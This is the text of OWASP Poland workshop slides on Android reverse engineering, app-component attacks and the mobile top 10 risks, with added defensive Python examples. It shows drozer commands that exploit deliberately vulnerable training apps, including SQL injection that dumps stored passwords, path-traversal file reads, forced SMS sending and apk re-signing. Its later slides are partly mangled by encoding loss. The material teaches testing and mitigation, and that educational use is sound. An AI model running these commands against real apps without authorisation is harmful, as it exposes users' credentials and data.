• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Using APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly (smali) code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - dex2jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows to use any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – GUI Java decompilers (JD-GUI is built on JD-Core, Luyten is a front-end for the Procyon decompiler)
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install time security decisions
• Android 6.0 security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers
Google Play
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps. The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install; Potentially Harmful Applications are warned about or blocked. Over 10 million installs are verified every day. Verification is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
Activities, Services, Content providers, Broadcast receivers
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Component attributes:
• debuggable
• enabled
• exported
• permission
Example component attributes (Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.

  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage: see the drozer user guide in the references
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse, together with adb, so it's enough to just "click and play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker) it can be abused
• By launching it with Intents it's possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme (diagram: apps A and B, and a malicious app E)
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like Intents, files or the network stack)
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running, to check for sensitive info
• Fire off Intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app (holding the right permission) can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions
  dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
  – Just query it:
    dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
  dz> run scanner.provider.injection -a com.mwr.example.sieve
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--;"
  | Password         | pin  |
  | thisismypassword | 9876 |
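The following is an added example (editor-supplied, not code from the workshop or from Sieve) that rebuilds why the two drozer queries above work, using Python's sqlite3 against a constructed copy of Sieve's two tables. `vulnerable_query` does what a ContentProvider.query() that concatenates the caller's projection and selection into SQL does; `safe_query` allow-lists the projection and binds the selection values, which is what SQLiteQueryBuilder with a projection map and selectionArgs gives you on Android. Table contents are made up.

```python
"""Content-provider SQL injection via projection and selection, and the parameterised fix."""
import sqlite3
from typing import List, Optional, Sequence, Tuple

PASSWORD_COLUMNS = ("_id", "service", "username", "password", "email")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for Sieve's database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                               password BLOB, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords(service, username, password, email)
             VALUES ('Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return db


def vulnerable_query(db, projection: Optional[Sequence[str]], selection: Optional[str],
                     selection_args: Sequence = ()) -> List[tuple]:
    """Caller-controlled SQL fragments pasted straight into the statement."""
    sql = "SELECT %s FROM Passwords" % (", ".join(projection) if projection else "*")
    if selection:
        sql += " WHERE (%s)" % selection
    return db.execute(sql, tuple(selection_args)).fetchall()


def error_for(db, projection, selection) -> Optional[str]:
    """What the provider reports back on a broken query (drozer prints it verbatim)."""
    try:
        vulnerable_query(db, projection, selection)
        return None
    except sqlite3.OperationalError as e:
        return str(e)


def safe_query(db, projection: Optional[Sequence[str]],
               where: Sequence[Tuple[str, object]] = ()) -> List[tuple]:
    """Projection restricted to known columns; selection is (column, value) pairs bound as parameters."""
    cols = list(projection) if projection else list(PASSWORD_COLUMNS)
    unknown = [c for c in cols if c not in PASSWORD_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % ", ".join(unknown))
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    params: List[object] = []
    clauses: List[str] = []
    for col, value in where:
        if col not in PASSWORD_COLUMNS:
            raise ValueError("unknown column: %s" % col)
        clauses.append("%s = ?" % col)     # column name from the allow-list, value bound
        params.append(value)
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return db.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(db, ["* FROM Key--"], None))   # the --projection trick: Key table leaks
    print(error_for(db, None, "'"))                        # the --selection probe: SQL error
    try:
        safe_query(db, ["* FROM Key--"])
    except ValueError as e:
        print("rejected:", e)
```

The `--projection "* FROM Key--"` payload works because the provider's string becomes `SELECT * FROM Key-- FROM Passwords`: the comment marker swallows the real table name, so the query runs against whichever table the attacker named.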
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
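The following is an added example (editor-supplied, not code from the workshop or from Sieve) of the openFile() mistake behind the FileBackupProvider reads above, next to the check that stops it. The vulnerable resolver appends the URI path to the backup directory unchecked, so "../secret/database.db" or an absolute "/etc/hosts" leaves the directory; the safe resolver canonicalises with realpath (which also follows symlinks) and refuses anything outside the base. The directory layout is built in a temporary folder to stand in for the provider's backup directory.

```python
"""Path traversal in a file-serving content provider: unchecked join vs. canonicalise-and-contain."""
import os
import tempfile
from typing import Tuple


class TraversalError(ValueError):
    pass


def vulnerable_resolve(backup_dir: str, requested: str) -> str:
    """What the leaky provider does.  os.path.join also discards backup_dir entirely
    when `requested` is absolute, which is how /etc/hosts came out of drozer above."""
    return os.path.join(backup_dir, requested)


def safe_resolve(backup_dir: str, requested: str) -> str:
    base = os.path.realpath(backup_dir)
    # strip leading separators first so an absolute request cannot replace the base
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError("path escapes %s: %r" % (base, requested))
    return candidate


def escapes(backup_dir: str, requested: str) -> bool:
    """True when the safe resolver refuses the request."""
    try:
        safe_resolve(backup_dir, requested)
        return False
    except TraversalError:
        return True


def readable_via(resolver, backup_dir: str, requested: str) -> bool:
    """Does the given resolver let a caller reach a real file at `requested`?"""
    try:
        return os.path.isfile(resolver(backup_dir, requested))
    except TraversalError:
        return False


def build_fixture() -> Tuple[str, str]:
    """<tmp>/backups/notes.txt is legitimately served; <tmp>/secret/database.db must stay private.
    A symlink inside the served directory pointing outside is added where the OS allows it."""
    root = tempfile.mkdtemp(prefix="provider-demo-")
    backups = os.path.join(root, "backups")
    secret_dir = os.path.join(root, "secret")
    os.makedirs(backups)
    os.makedirs(secret_dir)
    with open(os.path.join(backups, "notes.txt"), "w") as f:
        f.write("shopping list\n")
    secret = os.path.join(secret_dir, "database.db")
    with open(secret, "wb") as f:
        f.write(b"SQLite format 3\x00")
    try:
        os.symlink(secret, os.path.join(backups, "link-to-db"))
    except (OSError, NotImplementedError, AttributeError):
        pass
    return backups, secret


if __name__ == "__main__":
    backups, _ = build_fixture()
    for req in ("notes.txt", "../secret/database.db", "/etc/hosts", "link-to-db"):
        print("%-24s vulnerable:%-5s safe:%s" % (req, readable_via(vulnerable_resolve, backups, req),
                                                  readable_via(safe_resolve, backups, req)))
```

Checking with `startswith` on the un-normalised string is the usual half-fix; it is beaten by `..` segments and by symlinks, which is why both paths go through `realpath` before the containment test.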
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:

  <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
          <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />

The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:

  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }

Sending the Intent from drozer:
  dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Set the android:exported attribute to false (then only code running under the same user ID as the current app can reach the component)
• Limit access with a permission on the component: a custom permission you define (ideally with protectionLevel="signature"), or a system one such as RECEIVE_SMS
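The following is an added example (editor-supplied, not code from the workshop) that enumerates which components an app exposes from its AndroidManifest.xml. That enumeration is the first step of the activity-bypass check in M5, of the intent-injection checks in M7 and of the component attacks in this section (it is the same information drozer's app.package.manifest and app.*.info modules print), and its output is what the two defenses above are meant to empty. Run it on the plain-XML manifest apktool writes (`apktool d app.apk` produces app/AndroidManifest.xml). Rules applied: an explicit android:exported wins; otherwise an activity, service or receiver is exported iff it declares an intent-filter, and a provider is exported by default only when minSdkVersion or targetSdkVersion is 16 or lower; a permission on the component, or one set on the application element, guards it. The manifest below is constructed and com.example.victim is a made-up package.

```python
"""List exported components and the ones no permission protects (the attack surface)."""
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def attr(elem: ET.Element, name: str, default=None):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def sdk_levels(root: ET.Element):
    uses = root.find("uses-sdk")
    if uses is None:
        return 1, 1
    min_sdk = int(attr(uses, "minSdkVersion", "1"))
    return min_sdk, int(attr(uses, "targetSdkVersion", str(min_sdk)))


def is_exported(elem: ET.Element, min_sdk: int, target_sdk: int) -> bool:
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    if elem.tag == "provider":
        return min_sdk <= 16 or target_sdk <= 16     # old-SDK default: providers are public
    return elem.find("intent-filter") is not None    # a filter implies exported


def audit_manifest(xml_text: str) -> List[Dict]:
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    app = root.find("application")
    if app is None:
        return []
    min_sdk, target_sdk = sdk_levels(root)
    app_perm = attr(app, "permission")               # applies to every component lacking its own
    results = []
    for elem in app:
        if elem.tag not in COMPONENT_TAGS:
            continue
        name = attr(elem, "name", "")
        if name.startswith("."):
            name = pkg + name
        elif "." not in name:
            name = pkg + "." + name
        perms = [p for p in (attr(elem, "permission"), attr(elem, "readPermission"),
                             attr(elem, "writePermission")) if p]
        if not perms and app_perm:
            perms = [app_perm]
        exported = is_exported(elem, min_sdk, target_sdk)
        results.append({
            "type": elem.tag, "name": name, "exported": exported, "permissions": perms,
            "unprotected": exported and not perms,
            "actions": [attr(act, "name") for act in elem.iter("action")],
        })
    return results


def attack_surface(xml_text: str) -> List[Dict]:
    """Components any unprivileged app on the device can reach."""
    return [c for c in audit_manifest(xml_text) if c["unprotected"]]


# Constructed manifest: note minSdkVersion 15, which silently exports NotesProvider.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.victim">
  <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="23"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <permission android:name="com.example.victim.ADMIN" android:protectionLevel="signature"/>
  <application android:label="Victim" android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PasswordListActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <activity android:name=".AdminActivity" android:exported="true"
              android:permission="com.example.victim.ADMIN"/>
    <service android:name=".SyncService" android:exported="false"/>
    <receiver android:name=".SendSmsReceiver">
      <intent-filter>
        <action android:name="com.example.victim.SOCIAL_SMS"/>
      </intent-filter>
    </receiver>
    <provider android:name=".NotesProvider" android:authorities="com.example.victim.notes"/>
    <provider android:name=".BackupProvider" android:authorities="com.example.victim.backup"
              android:exported="true"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for c in audit_manifest(SAMPLE_MANIFEST):
        state = "EXPOSED" if c["unprotected"] else ("guarded by " + ",".join(c["permissions"]) if c["exported"] else "private")
        print("%-9s %-45s %s" % (c["type"], c["name"], state))
```

Everything the script reports as EXPOSED is a target for app.activity.start, app.broadcast.send or app.provider.query; the receiver with a filter and no permission is exactly the GoatDroid SendSMSNowReceiver pattern shown above.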
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
  adb pull /data/data/<apk_package_name>
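The following is an added example (editor-supplied, not code from the workshop) that automates the last two steps above: pull the app's data directory twice (say before and after logging in), snapshot both trees and diff them to see which files the app wrote, then list the files other apps could read, which is what MODE_WORLD_READABLE (and external storage) produce: the "other" read bit is set. The tree is constructed in a temporary directory to stand in for /data/data/<package>; the file names are made up.

```python
"""Diff two pulls of an app's data directory and flag world-readable files."""
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def snapshot(root: str) -> Dict[str, Tuple[int, int]]:
    """relative path -> (permission bits, size) for every regular file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode):
                out[os.path.relpath(full, root)] = (stat.S_IMODE(st.st_mode), st.st_size)
    return out


def diff_snapshots(before: Dict, after: Dict) -> Dict[str, List[str]]:
    return {
        "added":   sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(p for p in set(before) & set(after) if before[p] != after[p]),
    }


def world_readable(root: str) -> List[str]:
    """Files any other uid on the device can open for reading (S_IROTH set)."""
    return sorted(p for p, (mode, _) in snapshot(root).items() if mode & stat.S_IROTH)


def build_fixture() -> str:
    """Constructed app data dir as it looks right after install."""
    root = tempfile.mkdtemp(prefix="appdata-")

    def put(rel: str, content: str, mode: int) -> None:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(content)
        os.chmod(full, mode)

    put("shared_prefs/session.xml", '<map><string name="token">abc</string></map>', 0o660)
    put("databases/app.db", "SQLite format 3", 0o600)
    return root


def simulate_first_login(root: str) -> None:
    """What a careless app does after login: a credentials file written MODE_WORLD_READABLE
    and a row appended to the database."""
    creds = os.path.join(root, "shared_prefs", "creds.xml")
    with open(creds, "w") as f:
        f.write('<map><string name="password">Winter2016!</string></map>')
    os.chmod(creds, 0o664)                      # MODE_WORLD_READABLE adds S_IROTH
    with open(os.path.join(root, "databases", "app.db"), "a") as f:
        f.write(" + one more row")


def demo() -> Tuple[Dict[str, List[str]], List[str]]:
    root = build_fixture()
    before = snapshot(root)
    simulate_first_login(root)
    return diff_snapshots(before, snapshot(root)), world_readable(root)


if __name__ == "__main__":
    changes, readable = demo()
    print("changes:", changes)
    print("world-readable:", readable)
```

On a real device the two `adb pull` trees are the inputs to `snapshot`; permission bits survive the pull only when you run it as root (or look at `ls -l` in an adb shell on the device itself), so on a non-rooted device use the on-device listing for the `world_readable` part.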
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Encrypt what you store locally (note that DevicePolicyManager.setStorageEncryption() only requests full-device encryption through a device admin; it does not protect your files from other apps on a running device)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT created with MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embed the expected X.509 certificate or public key in the source code
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end-point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
